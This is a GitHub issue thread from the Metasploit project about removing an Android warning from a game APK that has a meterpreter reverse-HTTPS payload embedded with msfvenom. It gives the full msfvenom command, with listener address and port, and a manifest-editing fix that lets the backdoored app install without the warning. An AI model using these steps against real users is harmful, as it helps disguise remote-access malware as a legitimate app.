### ISSUE TITLE
Is possible to prevent, instead of ignoring, the "App was maded for an older version" warning ?

### ISSUE THREAD

**Issue by legilimency31** [rapid7/metasploit-framework#16146]
While the original apk that im embedding is installled without any warning in the android 10, the embedded apk shows the **_Old version_** warning, that, yes, can be ignored without affecting the payload, but its a lot better if it dont appears. 

There are other tools that manage to bypass this warning, such as ahmyth, but none are as usefull as metasploit.
 

### 1 - Maybe there is a parameter  that im missing ? 
`sudo msfvenom -x flappy_Bird.apk -p android/meterpreter/reverse_https lhost=192.168.1.108 lport=8080 -i 11 -f c -e x86/shikata_ga_nai -o test.apk
`

### 2- If not,  there is any manual modification that can be done in the decompiled payload to prevent the warning ? How the apk version is detected by the playstore protect ? Its something on the manifest ?  

**_EDIT_** : 

Metasploit embedded apk manifest part that shows the android version : 

`<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="23" android:compileSdkVersionCodename="6.0-2438415" package="com.dotgears.flappybird" platformBuildVersionCode="23" platformBuildVersionName="6.0-2438415">`

Respective part of the original apk manifest  : 

`<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.dotgears.flappybird">`

The yml file of both original and embedded apks are identical.

###  4 -  Or maybe there is a separated tool tthat could be used to recompile an andorid apk into a different version ?

**Comment by legilimency31** [comment]
Solution : 

`apktool d apk.file` and modify the apktool.yml : 
change the   targetSdkVersion to mach the target version, or to be higher then 23. Not sure wich one solved the issue, since i did both at the same time, changing to 29. 

Aparently api level 23 or higher has some new security measures, so the playstore warning might be refering to an version older then 23, instead of an version older then the target current version. But worth notting that solving this leads to another inconvenience : **_If the target vesion is higher then 23, the apk, or at least the ones i tried, will not ask for permission on instalation_**, but during the usage of the app or by manually allowing it on `configuration>apps>my_app>permissions>allow_permissions` . So unless the apk is coded to asks for the exact permission you want during usage, the user will have to manually allow them.

**Comment by timwr** [comment]
Thanks @legilimency31 
In future perhaps we can add a meterpreter command to request the permissions at runtime.
Unfortunately currently the maven build system does not support the latest Android APIs, but we can look at fixing that.
